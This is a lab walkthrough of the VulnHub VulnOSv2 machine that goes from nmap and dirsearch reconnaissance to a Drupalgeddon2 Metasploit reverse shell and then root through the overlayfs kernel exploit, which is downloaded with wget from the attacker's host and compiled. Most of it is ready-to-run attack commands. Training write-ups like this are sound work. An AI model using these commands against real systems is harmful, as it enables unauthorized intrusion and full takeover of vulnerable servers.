1. Information Gathering
1.1 Host Scanning
I. nmap
┌──(root㉿W1sh)-[~]
└─# nmap -T4 -sP 192.168.56.1-255
┌──(root㉿W1sh)-[~]
└─# nmap -T4 -sS -sV -Pn -A -p- --open 192.168.56.104
Port | Status | Service | Comments |
22 | Open | OpenSSH 6.6.1p1 | |
80 | Open | Apache httpd 2.4.7 | |
6667 | Open | ngircd | |
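Note that `-sP` has been deprecated in recent Nmap releases in favour of the equivalent `-sn` (host discovery without a port scan). The two-phase approach above can be sketched as follows; the addresses are this lab's host-only network, adjust to your own:

```shell
# Phase 1: host discovery only, no port scan (-sn replaces the older -sP)
nmap -T4 -sn 192.168.56.1-255

# Phase 2: full scan of the discovered host
#   -sS  SYN scan            -sV  service/version detection
#   -Pn  skip host discovery (we already know it is up)
#   -A   OS detection, default scripts, traceroute
#   -p-  all 65535 TCP ports --open  show only open ports
nmap -T4 -sS -sV -Pn -A -p- --open 192.168.56.104
```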
1.2 Vulnerability Detection
I. Port 22/SSH
SearchSploit
Services
Nothing found for OpenSSH 6.6.1
II. Port 80/HTTP
SearchSploit
Services
Nothing found for Apache httpd 2.4.7
Frameworks (Penetrated)
Quite a few vulnerabilities were found for Drupal 7.
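The lookups above were done with SearchSploit; a sketch of the queries, using the version strings from the nmap output (the comments reflect this box's results, not every possible hit):

```shell
# Nothing directly exploitable for the two service versions on this box
searchsploit "OpenSSH 6.6.1"
searchsploit "Apache 2.4.7"

# Many hits for the CMS, including Drupalgeddon 2 (CVE-2018-7600)
searchsploit "Drupal 7"
```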
Get shell
After testing, we can use Metasploit's module exploit/unix/webapp/drupal_drupalgeddon2 to complete this penetration.
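The module run can be scripted with a Metasploit resource file. The LHOST value below is an assumption (the attacker's address on the host-only network); RHOSTS and TARGETURI come from the scan and dirsearch results above:

```shell
# drupalgeddon2.rc — Metasploit resource script
# LHOST 192.168.56.103 is an assumption: replace with your own host-only IP.
cat > drupalgeddon2.rc <<'EOF'
use exploit/unix/webapp/drupal_drupalgeddon2
set RHOSTS 192.168.56.104
set TARGETURI /jabc/
set LHOST 192.168.56.103
run
EOF

msfconsole -q -r drupalgeddon2.rc
```

On success the module returns a meterpreter session as www-data.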
Web
dirsearch
┌──(root㉿W1sh)-[~/vulnhub/vulnosv2]
└─# dirsearch -u http://192.168.56.104/jabc/ -t100 -x 404,403,301
Code | Size | Path |
200 | 1KB | http://192.168.56.104/jabc/includes/ |
200 | 1KB | http://192.168.56.104/jabc/install.php |
200 | 1KB | http://192.168.56.104/jabc/install.php?profile=default |
200 | 42B | http://192.168.56.104/jabc/xmlrpc.php |
200 | 117KB | http://192.168.56.104/jabc/includes/bootstrap.inc |
200 | 271B | http://192.168.56.104/jabc/profiles/minimal/minimal.info |
200 | 278B | http://192.168.56.104/jabc/profiles/testing/testing.info |
200 | 459B | http://192.168.56.104/jabc/scripts/ |
200 | 470B | http://192.168.56.104/jabc/templates/ |
200 | 534B | http://192.168.56.104/jabc/themes/ |
200 | 649B | http://192.168.56.104/jabc/robots.txt |
200 | 743B | http://192.168.56.104/jabc/profiles/standard/standard.info |
200 | 849B | http://192.168.56.104/jabc/modules/ |
robots.txt
#
# robots.txt
#
# This file is to prevent the crawling and indexing of certain parts
# of your site by web crawlers and spiders run by sites like Yahoo!
# and Google. By telling these "robots" where not to go on your site,
# you save bandwidth and server resources.
#
# This file will be ignored unless it is at the root of your host:
# Used: http://example.com/robots.txt
# Ignored: http://example.com/site/robots.txt
#
# For more information about the robots.txt standard, see:
# http://www.robotstxt.org/wc/robots.html
#
# For syntax checking, see:
# http://www.sxw.org.uk/computing/robots/check.html
User-agent: *
Crawl-delay: 10
# Directories
Disallow: /includes/
Disallow: /misc/
Disallow: /modules/
Disallow: /profiles/
Disallow: /scripts/
Disallow: /themes/
# Files
Disallow: /CHANGELOG.txt
Disallow: /cron.php
Disallow: /INSTALL.mysql.txt
Disallow: /INSTALL.pgsql.txt
Disallow: /INSTALL.sqlite.txt
Disallow: /install.php
Disallow: /INSTALL.txt
Disallow: /LICENSE.txt
Disallow: /MAINTAINERS.txt
Disallow: /update.php
Disallow: /UPGRADE.txt
Disallow: /xmlrpc.php
# Paths (clean URLs)
Disallow: /admin/
Disallow: /comment/reply/
Disallow: /filter/tips/
Disallow: /node/add/
Disallow: /search/
Disallow: /user/register/
Disallow: /user/password/
Disallow: /user/login/
Disallow: /user/logout/
# Paths (no clean URLs)
Disallow: /?q=admin/
Disallow: /?q=comment/reply/
Disallow: /?q=filter/tips/
Disallow: /?q=node/add/
Disallow: /?q=search/
Disallow: /?q=user/password/
Disallow: /?q=user/register/
Disallow: /?q=user/login/
Disallow: /?q=user/logout/
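The robots.txt above is the stock Drupal one, which confirms the CMS. When the admin has not removed it, the disallowed CHANGELOG.txt also reveals the exact core version; a quick check using the path layout from the dirsearch results:

```shell
# The first "Drupal x.y" line of a stock CHANGELOG.txt is the installed version.
curl -s http://192.168.56.104/jabc/CHANGELOG.txt | head -n 3
```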
2. Escalation
2.1 Upgrade the reverse shell
For a better interactive experience, we make the following changes:
meterpreter > shell
Process 2693 created.
Channel 1 created.
python -c "import pty;pty.spawn('/bin/bash')"
www-data@VulnOSv2:/var/www/html/jabc$
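The pty trick above gives a bash prompt but still no job control, Ctrl-C handling, or tab completion. A common follow-up sequence (the key bindings assume a Linux attacker terminal):

```shell
# 1. In the reverse shell: spawn a pseudo-terminal
python -c "import pty; pty.spawn('/bin/bash')"

# 2. Background the shell with Ctrl-Z, then in the LOCAL terminal:
stty raw -echo; fg

# 3. Back in the remote shell, fix the terminal type so clear/vi work:
export TERM=xterm
```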
2.2 Users
I. www-data
suid
$ find / -perm -u=s -type f -ls 2>/dev/null
Nothing useful was found.
crontab
Nothing useful was found.
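For completeness, the locations typically enumerated for cron-based escalation (nothing stood out on this box):

```shell
cat /etc/crontab 2>/dev/null       # system-wide table
ls -la /etc/cron.d /etc/cron.daily /etc/cron.hourly /etc/cron.weekly 2>/dev/null
crontab -l 2>/dev/null             # current user's crontab, if any
```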
2.3 System
I. Kernel (Rooted)
System | Version |
Ubuntu | 14.04.4 LTS |
Kernel | Version | Bits |
Linux | 3.13.0 | i686 |
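Ubuntu 14.04 with a 3.13.0 kernel falls in the range affected by the overlayfs local privilege escalation (CVE-2015-1328, Exploit-DB 37292), a common route to root on this VM. A sketch of the usual steps; the attacker IP and the /tmp upload path are assumptions:

```shell
# On the attacker machine: mirror the exploit source and serve it
searchsploit -m 37292              # copies 37292.c to the current directory
python3 -m http.server 80

# On the target, as www-data:
cd /tmp
wget http://192.168.56.103/37292.c # assumption: attacker's host-only IP
gcc 37292.c -o ofs
./ofs                              # drops a root shell if vulnerable
id
```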
Originally published on the WeChat public account W1sh: [Vulnhub] VulnOSv2